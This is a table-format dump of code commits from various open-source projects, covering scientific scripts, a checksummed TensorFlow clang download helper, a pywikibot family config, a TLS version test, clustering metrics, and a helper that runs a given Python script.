commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13
values | lang stringclasses 23
values |
|---|---|---|---|---|---|---|---|---|
1ace5845055050c0ac3d9e14a5f76ad78f6778bf | Add python script for calculating fuel pitch fraction. | gridley/moltres,arfc/moltres,arfc/moltres,arfc/moltres,arfc/moltres,lindsayad/moltres,lindsayad/moltres,lindsayad/moltres,lindsayad/moltres,gridley/moltres,gridley/moltres,gridley/moltres | python/calc_fuel_pitch_fraction.py | python/calc_fuel_pitch_fraction.py | import sympy as sp
import sys
def calc_spacing(R, n):
x = sp.symbols('x')
Af = 0
Am = 0
for m in range(2*n - 1):
if m % 2 == 0:
Af += sp.pi * (R/n * (m/2 + x))**2
if m % 2 == 1:
Af -= sp.pi * (R/n * (m+1)/2)**2
for m in range(2*n):
if m % 2 == 0:
Am -= sp.pi * (R/n * (m/2 + x))**2
if m % 2 == 1:
Am += sp.pi * (R/n * (m+1)/2)**2
return sp.solve(Af / (Af + Am) - .225, x)
print(calc_spacing(float(sys.argv[1]), int(sys.argv[2])))
| lgpl-2.1 | Python | |
975493d0376dd565242718c588ce0d24eca8b923 | add initial script for copying local solutions to the baseline directory | OpenFAST/r-test,OpenFAST/r-test | newBaselineSolutions.py | newBaselineSolutions.py | """
"""
import sys
import os
import shutil
##### Helper functions
def exitWithError(error):
print(error)
sys.exit(1)
def exitWithDirNotFound(dir):
exitWithError("Directory does not exist: {}\n".format(dir))
##### Main
sourceDir = sys.argv[1]
targetDir = sys.argv[2]
machine = sys.argv[3]
compiler = sys.argv[4]
destinationDir = os.path.join(targetDir, "{}-{}".format(machine, compiler))
# verify source directory exists. if not, bail
if not os.path.isdir(sourceDir):
exitWithDirNotFound(sourceDir)
# verify destination directory exists. if not, make it
if not os.path.isdir(destinationDir):
os.makedirs(destinationDir)
sourceFiles = os.listdir(sourceDir)
targetExtensions = [".out", ".outb", ".sum"]
targetFiles = [s for s in sourceFiles for t in targetExtensions if t in s]
for f in targetFiles:
print f, os.path.join(sourceDir,f), os.path.join(destinationDir,f)
shutil.copyfile(os.path.join(sourceDir,f), os.path.join(destinationDir,f))
| apache-2.0 | Python | |
3646ca1fc66a174d787ffd4a7569f48bc8f23cf5 | Update downladable clang to r335091. | jbedorf/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,dancingdan/tensorflow,xzturn/tensorflow,jalexvig/tensorflow,snnn/tensorflow,Bismarrck/tensorflow,aselle/tensorflow,Bismarrck/tensorflow,tensorflow/tensorflow,caisq/tensorflow,frreiss/tensorflow-fred,ppwwyyxx/tensorflow,freedomtan/tensorflow,frreiss/tensorflow-fred,adit-chandra/tensorflow,kevin-coder/tensorflow-fork,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,annarev/tensorflow,jendap/tensorflow,cxxgtxy/tensorflow,yongtang/tensorflow,aam-at/tensorflow,yongtang/tensorflow,jhseu/tensorflow,ageron/tensorflow,drpngx/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,aam-at/tensorflow,DavidNorman/tensorflow,tensorflow/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,adit-chandra/tensorflow,ageron/tensorflow,dongjoon-hyun/tensorflow,hfp/tensorflow-xsmm,aam-at/tensorflow,petewarden/tensorflow,aselle/tensorflow,asimshankar/tensorflow,jbedorf/tensorflow,seanli9jan/tensorflow,paolodedios/tensorflow,theflofly/tensorflow,ppwwyyxx/tensorflow,tensorflow/tensorflow-pywrap_saved_model,manipopopo/tensorflow,renyi533/tensorflow,dancingdan/tensorflow,petewarden/tensorflow,davidzchen/tensorflow,brchiu/tensorflow,ppwwyyxx/tensorflow,dancingdan/tensorflow,gunan/tensorflow,annarev/tensorflow,jbedorf/tensorflow,kobejean/tensorflow,freedomtan/tensorflow,theflofly/tensorflow,apark263/tensorflow,davidzchen/tensorflow,karllessard/tensorflow,xzturn/tensorflow,dancingdan/tensorflow,aam-at/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,alsrgv/tensorflow,freedomtan/tensorflow,chemelnucfin/tensorflow,Intel-tensorflow/tensorflow,ghchinoy/tensorflow,gunan/tensorflow,renyi533/tensorflow,chemelnucfin/tensorflow,petewarden/tensorflow,girving/tensorflow,theflofly/tensorflow,ghchinoy/tensorflow,xzturn/tensorflow,yongtang/tensorflow,ZhangXinNan/tensorflow,xzturn/tensorflow,theflofly/tensorflow,theflofly/tensorflow,paolodedios/tensorflow,xodus7/tensorflow,sarvex/tensorflow,kevin-coder/tensorflow-fork,petewarden/tensorflow,ZhangXinNan/tensorflow,alshedivat/tensorflow,asimshankar/tensorflow,jendap/tensorflow,theflofly/tensorflow,freedomtan/tensorflow,kobejean/tensorflow,sarvex/tensorflow,snnn/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,AnishShah/tensorflow,xodus7/tensorflow,frreiss/tensorflow-fred,xzturn/tensorflow,asimshankar/tensorflow,chemelnucfin/tensorflow,paolodedios/tensorflow,davidzchen/tensorflow,brchiu/tensorflow,yongtang/tensorflow,jalexvig/tensorflow,gunan/tensorflow,ppwwyyxx/tensorflow,aselle/tensorflow,paolodedios/tensorflow,ghchinoy/tensorflow,asimshankar/tensorflow,renyi533/tensorflow,davidzchen/tensorflow,snnn/tensorflow,ppwwyyxx/tensorflow,alshedivat/tensorflow,seanli9jan/tensorflow,ZhangXinNan/tensorflow,karllessard/tensorflow,dongjoon-hyun/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,AnishShah/tensorflow,DavidNorman/tensorflow,caisq/tensorflow,drpngx/tensorflow,petewarden/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,seanli9jan/tensorflow,apark263/tensorflow,gautam1858/tensorflow,freedomtan/tensorflow,xodus7/tensorflow,yongtang/tensorflow,drpngx/tensorflow,Intel-tensorflow/tensorflow,davidzchen/tensorflow,annarev/tensorflow,jhseu/tensorflow,girving/tensorflow,hfp/tensorflow-xsmm,xodus7/tensorflow,alshedivat/tensorflow,Bismarrck/tensorflow,theflofly/tensorflow,adit-chandra/tensorflow,DavidNorman/tensorflow,sarvex/tensorflow,brchiu/tensorflow,AnishShah/tensorflow,aselle/tensorflow,davidzchen/tensorflow,aam-at/tensorflow,aselle/tensorflow,Bismarrck/tensorflow,adit-chandra/tensorflow,yongtang/tensorflow,frreiss/tensorflow-fred,ZhangXinNan/tensorflow,petewarden/tensorflow,girving/tensorflow,jendap/tensorflow,gautam1858/tensorflow,chemelnucfin/tensorflow,arborh/tensorflow,hehongliang/tensorflow,snnn/tensorflow,aldian/tensorflow,Bismarrck/tensorflow,Bismarrck/tensorflow,kobejean/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,aldian/tensorflow,frreiss/tensorflow-fred,manipopopo/tensorflow,jhseu/tensorflow,seanli9jan/tensorflow,girving/tensorflow,AnishShah/tensorflow,kevin-coder/tensorflow-fork,arborh/tensorflow,alsrgv/tensorflow,chemelnucfin/tensorflow,kobejean/tensorflow,jbedorf/tensorflow,theflofly/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,manipopopo/tensorflow,jbedorf/tensorflow,hfp/tensorflow-xsmm,freedomtan/tensorflow,caisq/tensorflow,hfp/tensorflow-xsmm,tensorflow/tensorflow-pywrap_saved_model,brchiu/tensorflow,chemelnucfin/tensorflow,AnishShah/tensorflow,hfp/tensorflow-xsmm,chemelnucfin/tensorflow,gautam1858/tensorflow,tensorflow/tensorflow,snnn/tensorflow,annarev/tensorflow,adit-chandra/tensorflow,gautam1858/tensorflow,renyi533/tensorflow,jendap/tensorflow,ageron/tensorflow,arborh/tensorflow,ppwwyyxx/tensorflow,caisq/tensorflow,kevin-coder/tensorflow-fork,adit-chandra/tensorflow,caisq/tensorflow,sarvex/tensorflow,gautam1858/tensorflow,karllessard/tensorflow,alsrgv/tensorflow,gautam1858/tensorflow,petewarden/tensorflow,dongjoon-hyun/tensorflow,aam-at/tensorflow,jbedorf/tensorflow,Intel-Corporation/tensorflow,paolodedios/tensorflow,karllessard/tensorflow,Intel-Corporation/tensorflow,gunan/tensorflow,aldian/tensorflow,DavidNorman/tensorflow,hehongliang/tensorflow,apark263/tensorflow,apark263/tensorflow,jart/tensorflow,cxxgtxy/tensorflow,DavidNorman/tensorflow,annarev/tensorflow,brchiu/tensorflow,dancingdan/tensorflow,annarev/tensorflow,alsrgv/tensorflow,manipopopo/tensorflow,kevin-coder/tensorflow-fork,jart/tensorflow,ZhangXinNan/tensorflow,alsrgv/tensorflow,gautam1858/tensorflow,aam-at/tensorflow,AnishShah/tensorflow,jalexvig/tensorflow,jart/tensorflow,snnn/tensorflow,girving/tensorflow,sarvex/tensorflow,DavidNorman/tensorflow,jalexvig/tensorflow,gunan/tensorflow,renyi533/tensorflow,tensorflow/tensorflow-pywrap_saved_model,arborh/tensorflow,hehongliang/tensorflow,yongtang/tensorflow,annarev/tensorflow,drpngx/tensorflow,sarvex/tensorflow,ageron/tensorflow,Bismarrck/tensorflow,tensorflow/tensorflow-pywrap_saved_model,ZhangXinNan/tensorflow,arborh/tensorflow,alshedivat/tensorflow,xzturn/tensorflow,apark263/tensorflow,xzturn/tensorflow,frreiss/tensorflow-fred,gautam1858/tensorflow,Intel-tensorflow/tensorflow,manipopopo/tensorflow,frreiss/tensorflow-fred,Intel-Corporation/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,drpngx/tensorflow,xodus7/tensorflow,ageron/tensorflow,gunan/tensorflow,jalexvig/tensorflow,ageron/tensorflow,caisq/tensorflow,apark263/tensorflow,dongjoon-hyun/tensorflow,ppwwyyxx/tensorflow,AnishShah/tensorflow,davidzchen/tensorflow,dancingdan/tensorflow,DavidNorman/tensorflow,petewarden/tensorflow,ageron/tensorflow,frreiss/tensorflow-fred,karllessard/tensorflow,tensorflow/tensorflow,frreiss/tensorflow-fred,ghchinoy/tensorflow,gunan/tensorflow,caisq/tensorflow,Bismarrck/tensorflow,xzturn/tensorflow,asimshankar/tensorflow,kevin-coder/tensorflow-fork,jendap/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,apark263/tensorflow,frreiss/tensorflow-fred,cxxgtxy/tensorflow,dancingdan/tensorflow,paolodedios/tensorflow,cxxgtxy/tensorflow,jbedorf/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,jendap/tensorflow,DavidNorman/tensorflow,asimshankar/tensorflow,aam-at/tensorflow,brchiu/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,cxxgtxy/tensorflow,tensorflow/tensorflow-pywrap_saved_model,aldian/tensorflow,arborh/tensorflow,Intel-Corporation/tensorflow,ppwwyyxx/tensorflow,ZhangXinNan/tensorflow,Intel-Corporation/tensorflow,asimshankar/tensorflow,dancingdan/tensorflow,asimshankar/tensorflow,renyi533/tensorflow,hfp/tensorflow-xsmm,ppwwyyxx/tensorflow,arborh/tensorflow,Intel-Corporation/tensorflow,jhseu/tensorflow,brchiu/tensorflow,tensorflow/tensorflow-pywrap_saved_model,jalexvig/tensorflow,snnn/tensorflow,alsrgv/tensorflow,girving/tensorflow,jart/tensorflow,xodus7/tensorflow,Bismarrck/tensorflow,chemelnucfin/tensorflow,ZhangXinNan/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,kobejean/tensorflow,xzturn/tensorflow,davidzchen/tensorflow,gautam1858/tensorflow,cxxgtxy/tensorflow,yongtang/tensorflow,aselle/tensorflow,adit-chandra/tensorflow,davidzchen/tensorflow,jart/tensorflow,girving/tensorflow,dongjoon-hyun/tensorflow,tensorflow/tensorflow,DavidNorman/tensorflow,dongjoon-hyun/tensorflow,jhseu/tensorflow,jart/tensorflow,ghchinoy/tensorflow,ghchinoy/tensorflow,renyi533/tensorflow,girving/tensorflow,brchiu/tensorflow,ageron/tensorflow,drpngx/tensorflow,davidzchen/tensorflow,asimshankar/tensorflow,renyi533/tensorflow,jbedorf/tensorflow,davidzchen/tensorflow,tensorflow/tensorflow,gautam1858/tensorflow,arborh/tensorflow,dongjoon-hyun/tensorflow,ageron/tensorflow,alshedivat/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,dongjoon-hyun/tensorflow,kevin-coder/tensorflow-fork,ghchinoy/tensorflow,AnishShah/tensorflow,hehongliang/tensorflow,sarvex/tensorflow,apark263/tensorflow,xzturn/tensorflow,theflofly/tensorflow,drpngx/tensorflow,hehongliang/tensorflow,Intel-tensorflow/tensorflow,jhseu/tensorflow,manipopopo/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,dongjoon-hyun/tensorflow,davidzchen/tensorflow,aselle/tensorflow,alshedivat/tensorflow,renyi533/tensorflow,seanli9jan/tensorflow,jbedorf/tensorflow,xodus7/tensorflow,cxxgtxy/tensorflow,annarev/tensorflow,hfp/tensorflow-xsmm,petewarden/tensorflow,jendap/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,alsrgv/tensorflow,sarvex/tensorflow,petewarden/tensorflow,jbedorf/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,ZhangXinNan/tensorflow,jhseu/tensorflow,gunan/tensorflow,tensorflow/tensorflow,xzturn/tensorflow,aselle/tensorflow,kobejean/tensorflow,jendap/tensorflow,tensorflow/tensorflow,AnishShah/tensorflow,frreiss/tensorflow-fred,ageron/tensorflow,manipopopo/tensorflow,alshedivat/tensorflow,jart/tensorflow,ppwwyyxx/tensorflow,xodus7/tensorflow,gunan/tensorflow,aam-at/tensorflow,tensorflow/tensorflow,theflofly/tensorflow,drpngx/tensorflow,apark263/tensorflow,dancingdan/tensorflow,seanli9jan/tensorflow,jart/tensorflow,jalexvig/tensorflow,caisq/tensorflow,DavidNorman/tensorflow,manipopopo/tensorflow,freedomtan/tensorflow,ageron/tensorflow,seanli9jan/tensorflow,asimshankar/tensorflow,xodus7/tensorflow,kevin-coder/tensorflow-fork,Intel-tensorflow/tensorflow,renyi533/tensorflow,aselle/tensorflow,karllessard/tensorflow,freedomtan/tensorflow,tensorflow/tensorflow,aam-at/tensorflow,Intel-tensorflow/tensorflow,DavidNorman/tensorflow,freedomtan/tensorflow,jhseu/tensorflow,hehongliang/tensorflow,girving/tensorflow,Intel-tensorflow/tensorflow,jbedorf/tensorflow,alshedivat/tensorflow,tensorflow/tensorflow,ZhangXinNan/tensorflow,hfp/tensorflow-xsmm,chemelnucfin/tensorflow,chemelnucfin/tensorflow,yongtang/tensorflow,renyi533/tensorflow,dongjoon-hyun/tensorflow,renyi533/tensorflow,kobejean/tensorflow,seanli9jan/tensorflow,kobejean/tensorflow,jalexvig/tensorflow,ghchinoy/tensorflow,frreiss/tensorflow-fred,jendap/tensorflow,apark263/tensorflow,seanli9jan/tensorflow,kevin-coder/tensorflow-fork,theflofly/tensorflow,annarev/tensorflow,jart/tensorflow,hfp/tensorflow-xsmm,cxxgtxy/tensorflow,dancingdan/tensorflow,Intel-Corporation/tensorflow,Intel-tensorflow/tensorflow,aselle/tensorflow,Bismarrck/tensorflow,ageron/tensorflow,hehongliang/tensorflow,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,ZhangXinNan/tensorflow,alsrgv/tensorflow,hfp/tensorflow-xsmm,jhseu/tensorflow,jbedorf/tensorflow,petewarden/tensorflow,dancingdan/tensorflow,ghchinoy/tensorflow,arborh/tensorflow,manipopopo/tensorflow,alshedivat/tensorflow,ppwwyyxx/tensorflow,brchiu/tensorflow,Bismarrck/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,gunan/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_tf_optimizer,aam-at/tensorflow,alshedivat/tensorflow,jendap/tensorflow,jhseu/tensorflow,girving/tensorflow,kevin-coder/tensorflow-fork,snnn/tensorflow,ghchinoy/tensorflow,brchiu/tensorflow,freedomtan/tensorflow,yongtang/tensorflow,annarev/tensorflow,drpngx/tensorflow,dongjoon-hyun/tensorflow,petewarden/tensorflow,aldian/tensorflow,aam-at/tensorflow,caisq/tensorflow,adit-chandra/tensorflow,adit-chandra/tensorflow,caisq/tensorflow,alsrgv/tensorflow,Intel-tensorflow/tensorflow,snnn/tensorflow,aldian/tensorflow,kobejean/tensorflow,manipopopo/tensorflow,AnishShah/tensorflow,paolodedios/tensorflow,hfp/tensorflow-xsmm,xzturn/tensorflow,xodus7/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,alshedivat/tensorflow,ghchinoy/tensorflow,kobejean/tensorflow,drpngx/tensorflow,arborh/tensorflow,jendap/tensorflow,jalexvig/tensorflow,apark263/tensorflow,kobejean/tensorflow,adit-chandra/tensorflow,snnn/tensorflow,chemelnucfin/tensorflow,xodus7/tensorflow,gunan/tensorflow,arborh/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,adit-chandra/tensorflow,freedomtan/tensorflow,adit-chandra/tensorflow,gautam1858/tensorflow,ppwwyyxx/tensorflow,jhseu/tensorflow,jalexvig/tensorflow,brchiu/tensorflow,aldian/tensorflow,alsrgv/tensorflow,jalexvig/tensorflow,seanli9jan/tensorflow,jart/tensorflow,AnishShah/tensorflow,gautam1858/tensorflow,Intel-tensorflow/tensorflow,freedomtan/tensorflow,alsrgv/tensorflow,annarev/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,aselle/tensorflow,kevin-coder/tensorflow-fork,jhseu/tensorflow,DavidNorman/tensorflow,aldian/tensorflow,alsrgv/tensorflow,manipopopo/tensorflow,chemelnucfin/tensorflow,seanli9jan/tensorflow,theflofly/tensorflow,snnn/tensorflow,Intel-Corporation/tensorflow,asimshankar/tensorflow,ghchinoy/tensorflow,girving/tensorflow | third_party/clang_toolchain/download_clang.bzl | third_party/clang_toolchain/download_clang.bzl | """ Helpers to download a recent clang release."""
def _get_platform_folder(os_name):
os_name = os_name.lower()
if os_name.startswith('windows'):
return 'Win'
if os_name.startswith('mac os'):
return 'Mac'
if not os_name.startswith('linux'):
fail('Unknown platform')
return 'Linux_x64'
def _download_chromium_clang(repo_ctx, platform_folder, package_version, sha256,
out_folder):
cds_url = 'https://commondatastorage.googleapis.com/chromium-browser-clang'
cds_file = 'clang-%s.tgz' % package_version
cds_full_url = '{0}/{1}/{2}'.format(cds_url, platform_folder, cds_file)
repo_ctx.download_and_extract(cds_full_url, output=out_folder, sha256=sha256)
def download_clang(repo_ctx, out_folder):
""" Download a fresh clang release and put it into out_folder.
Clang itself will be located in 'out_folder/bin/clang'.
We currently download one of the latest releases of clang by the
Chromium project (see
https://chromium.googlesource.com/chromium/src/+/master/docs/clang.md).
Args:
repo_ctx: An instance of repository_context object.
out_folder: A folder to extract the compiler into.
"""
# TODO(ibiryukov): we currently download and extract some extra tools in the
# clang release (e.g., sanitizers). We should probably remove the ones
# we don't need and document the ones we want provide in addition to clang.
# Latest CLANG_REVISION and CLANG_SUB_REVISION of the Chromiums's release
# can be found in https://chromium.googlesource.com/chromium/src/tools/clang/+/master/scripts/update.py
CLANG_REVISION = '335091'
CLANG_SUB_REVISION = 1
package_version = '%s-%s' % (CLANG_REVISION, CLANG_SUB_REVISION)
checksums = {
'Linux_x64':
'17002b75293fccfdd175eacdc9ee47d97b58d7e98fef343384fbbef1b68ce99f',
'Mac':
'9351e46d28315daaa06a1eb55bd0370ed4aaeb693a2a3e82e48d2737d7723468',
'Win':
'e78a1e469224d6f6751b4df4374bf58893ac03900ec924e4c8264888ba4aeb1e',
}
platform_folder = _get_platform_folder(repo_ctx.os.name)
_download_chromium_clang(repo_ctx, platform_folder, package_version,
checksums[platform_folder], out_folder)
| """ Helpers to download a recent clang release."""
def _get_platform_folder(os_name):
os_name = os_name.lower()
if os_name.startswith('windows'):
return 'Win'
if os_name.startswith('mac os'):
return 'Mac'
if not os_name.startswith('linux'):
fail('Unknown platform')
return 'Linux_x64'
def _download_chromium_clang(repo_ctx, platform_folder, package_version, sha256,
out_folder):
cds_url = 'https://commondatastorage.googleapis.com/chromium-browser-clang'
cds_file = 'clang-%s.tgz' % package_version
cds_full_url = '{0}/{1}/{2}'.format(cds_url, platform_folder, cds_file)
repo_ctx.download_and_extract(cds_full_url, output=out_folder, sha256=sha256)
def download_clang(repo_ctx, out_folder):
""" Download a fresh clang release and put it into out_folder.
Clang itself will be located in 'out_folder/bin/clang'.
We currently download one of the latest releases of clang by the
Chromium project (see
https://chromium.googlesource.com/chromium/src/+/master/docs/clang.md).
Args:
repo_ctx: An instance of repository_context object.
out_folder: A folder to extract the compiler into.
"""
# TODO(ibiryukov): we currently download and extract some extra tools in the
# clang release (e.g., sanitizers). We should probably remove the ones
# we don't need and document the ones we want provide in addition to clang.
# Latest CLANG_REVISION and CLANG_SUB_REVISION of the Chromiums's release
# can be found in https://chromium.googlesource.com/chromium/src/tools/clang/+/master/scripts/update.py
CLANG_REVISION = '334100'
CLANG_SUB_REVISION = 1
package_version = '%s-%s' % (CLANG_REVISION, CLANG_SUB_REVISION)
checksums = {
'Linux_x64':
'3c57420b591601cd14b5babd74b58fcaefa877112938d70cca6f0a1b0b293ab4',
'Mac':
'97d313996fb97a6138635f963d7ef4efa9f028a8168bb7917cc428b9eab05ebb',
'Win':
'52c1d6d20a0733276597f4ced59d18b545769dbf8beb8c6bdc26a7a862da7fc9',
}
platform_folder = _get_platform_folder(repo_ctx.os.name)
_download_chromium_clang(repo_ctx, platform_folder, package_version,
checksums[platform_folder], out_folder)
| apache-2.0 | Python |
bfd85c18e788c4e89569f7a35fa85d80d3bcd031 | Add the IPython version helper | astrofrog/reducer,astrofrog/reducer,StuartLittlefair/reducer,StuartLittlefair/reducer,mwcraig/reducer | reducer/ipython_version_helper.py | reducer/ipython_version_helper.py | from __future__ import (division, print_function, absolute_import,
unicode_literals)
from IPython import version_info
def ipython_version_as_string():
"""
The IPython version is a tuple (major, minor, patch, vendor). We only
need major, minor, patch.
"""
return ''.join([str(s) for s in version_info[0:3]])
| bsd-3-clause | Python | |
cd7822eb0017a59e71fb98e395228f891282082f | Revert r10641 | smalyshev/pywikibot-core,PersianWikipedia/pywikibot-core,wikimedia/pywikibot-core,Darkdadaah/pywikibot-core,h4ck3rm1k3/pywikibot-core,hasteur/g13bot_tools_new,jayvdb/pywikibot-core,icyflame/batman,valhallasw/pywikibot-core,emijrp/pywikibot-core,hasteur/g13bot_tools_new,happy5214/pywikibot-core,magul/pywikibot-core,happy5214/pywikibot-core,h4ck3rm1k3/pywikibot-core,wikimedia/pywikibot-core,jayvdb/pywikibot-core,xZise/pywikibot-core,hasteur/g13bot_tools_new,darthbhyrava/pywikibot-local,VcamX/pywikibot-core,TridevGuha/pywikibot-core,trishnaguha/pywikibot-core,npdoty/pywikibot,npdoty/pywikibot,Darkdadaah/pywikibot-core,magul/pywikibot-core | pywikibot/families/commons_family.py | pywikibot/families/commons_family.py | # -*- coding: utf-8 -*-
__version__ = '$Id$'
from pywikibot import family
# The Wikimedia Commons family
class Family(family.Family):
def __init__(self):
family.Family.__init__(self)
self.name = 'commons'
self.langs = {
'commons': 'commons.wikimedia.org',
}
self.interwiki_forward = 'wikipedia'
self.category_redirect_templates = {
'commons': (u'Category redirect',
u'Categoryredirect',
u'Synonym taxon category redirect',
u'Invalid taxon category redirect',
u'Monotypic taxon category redirect',
u'See cat',
u'Seecat',
u'See category',
u'Catredirect',
u'Cat redirect',
u'Cat-red',
u'Catredir',
u'Redirect category'),
}
self.disambcatname = {
'commons': u'Disambiguation'
}
self.cross_projects = [
'wikipedia', 'wiktionary', 'wikibooks', 'wikiquote', 'wikisource', 'wikinews', 'wikiversity',
'meta', 'mediawiki', 'test', 'incubator', 'species',
]
def dbName(self, code):
return 'commonswiki_p'
def shared_image_repository(self, code):
return ('commons', 'commons')
def ssl_pathprefix(self, code):
return "/wikipedia/commons"
| # -*- coding: utf-8 -*-
__version__ = '$Id$'
from pywikibot import family
# The Wikimedia Commons family
class Family(family.Family):
def __init__(self):
family.Family.__init__(self)
self.name = 'commons'
self.langs = {
'commons': 'commons.wikimedia.org',
}
self.interwiki_forward = 'wikipedia'
self.category_redirect_templates = {
'commons': (u'Category redirect',
u'Categoryredirect',
u'Synonym taxon category redirect',
u'Invalid taxon category redirect',
u'Monotypic taxon category redirect',
u'See cat',
u'Seecat',
u'See category',
u'Catredirect',
u'Cat redirect',
u'Cat-red',
u'Catredir',
u'Redirect category'),
}
self.disambcatname = {
'commons': u'Disambiguation'
}
self.cross_projects = [
'wikipedia', 'wiktionary', 'wikibooks', 'wikiquote', 'wikisource', 'wikinews', 'wikiversity',
'meta', 'mediawiki', 'test', 'incubator', 'species',
]
def dbName(self, code):
return 'commonswiki_p'
def ssl_pathprefix(self, code):
return "/wikipedia/commons"
| mit | Python |
f110fdd778b450a0bed2b8bfb68f12648c4fd3e7 | add base_tester.py | clburlison/vendored,clburlison/vendored | tests/base_tester.py | tests/base_tester.py | # -*- coding: utf-8 -*-
"""
This is a utility script designed to allow you to run either py2 or py3 via:
/some/path/to/python base_tester.py
in order to verify TLS 1.2 support and the version of openssl that python is
linked against.
Thank you to Hanno Böck for providing https://fancyssl.hboeck.de/ for free.
"""
# standard libs
from __future__ import print_function
import sys
# patched ssl using tlsssl
try:
import tlsssl as ssl
except(ImportError):
import ssl
PY_VER = sys.version_info
print("Our python is located: {}".format(sys.executable))
print("Our python version: {}.{}.{}".format(PY_VER[0], PY_VER[1], PY_VER[2]))
print("Our openssl is: {}".format(ssl.OPENSSL_VERSION))
print("------------------------------------------------------------------")
ctx = ssl.create_default_context()
if PY_VER[0] == 2:
import urllib2
try:
a = urllib2.urlopen('https://fancyssl.hboeck.de/', context=ctx)
print(a)
print("SUCCESS: Connection was made using TLS1.2")
except(urllib2.URLError) as e:
print("ERROR: {}".format(e.reason))
if PY_VER[0] == 3:
import urllib.request
try:
a = urllib.request.urlopen('https://fancyssl.hboeck.de/', context=ctx)
print(a)
print("SUCCESS: Connection was made using TLS1.2")
except(ssl.SSLError, urllib.error.URLError) as e:
print("ERROR: {}".format(e.reason))
| mit | Python | |
f2044b0771f278c2a0de5cb69783b264a2d2363d | Add clustering metrics calculator file. | theovasi/browsewiki,theovasi/browsewiki,theovasi/browsewiki | cluster_metrics.py | cluster_metrics.py | "Calculates Silhouette coefficient and Calinski-Harabaz index for a kmeans model."
import os, sys
import argparse, joblib
from sklearn import metrics
def cluster_metrics(data_file_path):
if not os.path.exists(data_file_path + '/kmodel.txt'):
print('No k-means model file found.')
sys.exit(0)
kmodel = joblib.load(data_file_path + '/kmodel.txt')
# If no topic_space.txt file exists, the clustering was performed on the
# Tf-Idf matrix so load that instead.
if os.path.exists(data_file_path + '/topic_space.txt'):
vector_space = joblib.load(data_file_path + '/topic_space.txt')
print('Calculating metrics for topic vector space.')
else:
vector_space = joblib.load(data_file_path + '/tfidf_sparse.txt')
print('Calculating metrics for Tf-Idf vector space.')
silhouette = metrics.silhouette_score(vector_space, kmodel.labels_,
metric='euclidean')
calhar = metrics.calinski_harabaz_score(vector_space.toarray(), kmodel.labels_)
with open(data_file_path + '/metric_results.txt', 'w+') as output:
output.write('Silhouette coefficient: ' + str(silhouette))
output.write('\nCaliski-Harabaz index: ' + str(calhar))
if __name__ == '__main__':
parser = argparse.ArgumentParser('Parses data file path.')
parser.add_argument('data_file_path', type=str,
help='The file to the data directory.')
args = parser.parse_args()
cluster_metrics(args.data_file_path)
| mit | Python | |
3b182032ae092560b2423e77f657ec0794ce38e6 | Add new users to all deployments | cboling/xos,wathsalav/xos,cboling/xos,open-cloud/xos,opencord/xos,xmaruto/mcord,open-cloud/xos,wathsalav/xos,opencord/xos,wathsalav/xos,opencord/xos,zdw/xos,jermowery/xos,jermowery/xos,zdw/xos,zdw/xos,cboling/xos,wathsalav/xos,open-cloud/xos,xmaruto/mcord,zdw/xos,jermowery/xos,xmaruto/mcord,xmaruto/mcord,cboling/xos,cboling/xos,jermowery/xos | planetstack/model_policies/model_policy_User.py | planetstack/model_policies/model_policy_User.py | from core.models import *
def handle(user):
deployments = Deployment.objects.all()
site_deployments = SiteDeployments.objects.all()
site_deploy_lookup = defaultdict(list)
for site_deployment in site_deployments:
site_deploy_lookup[site_deployment.site].append(site_deployment.deployment)
user_deploy_lookup = defaultdict(list)
for user_deployment in UserDeployments.objects.all():
user_deploy_lookup[user_deployment.user].append(user_deployment.deployment)
all_deployments = Deployment.objects.filter()
if user.is_admin:
# admins should have an account at all deployments
expected_deployments = deployments
else:
# normal users should have an account at their site's deployments
#expected_deployments = site_deploy_lookup[user.site]
# users are added to all deployments for now
expected_deployments = deployments
for expected_deployment in expected_deployments:
if not user in user_deploy_lookup or \
expected_deployment not in user_deploy_lookup[user]:
# add new record
ud = UserDeployments(user=user, deployment=expected_deployment)
ud.save()
| apache-2.0 | Python | |
7e7bd440a1e3f585464df3458070528d0100d456 | Add helper to run requested Python script | gdb/pyseidon,gdb/pyseidon | pyseidon/handlers/__init__.py | pyseidon/handlers/__init__.py | import pyseidon
import sys
def handle_script():
import runpy
"""
Allow the client to run an arbitrary Python script.
Here's sample usage:
```
def expensive_setup():
...
if __name__ == '__main__':
expensive_setup()
import pyseidon.handlers
pyseidon.handlers.handle_script()
```
"""
def handler():
if len(sys.argv) < 1:
print >>sys.stderr, 'Must provide path to Python script to execute'
sys.exit(1)
runpy.run_path(sys.argv[0], run_name='__main__')
master = pyseidon.Pyseidon()
master.run(handler)
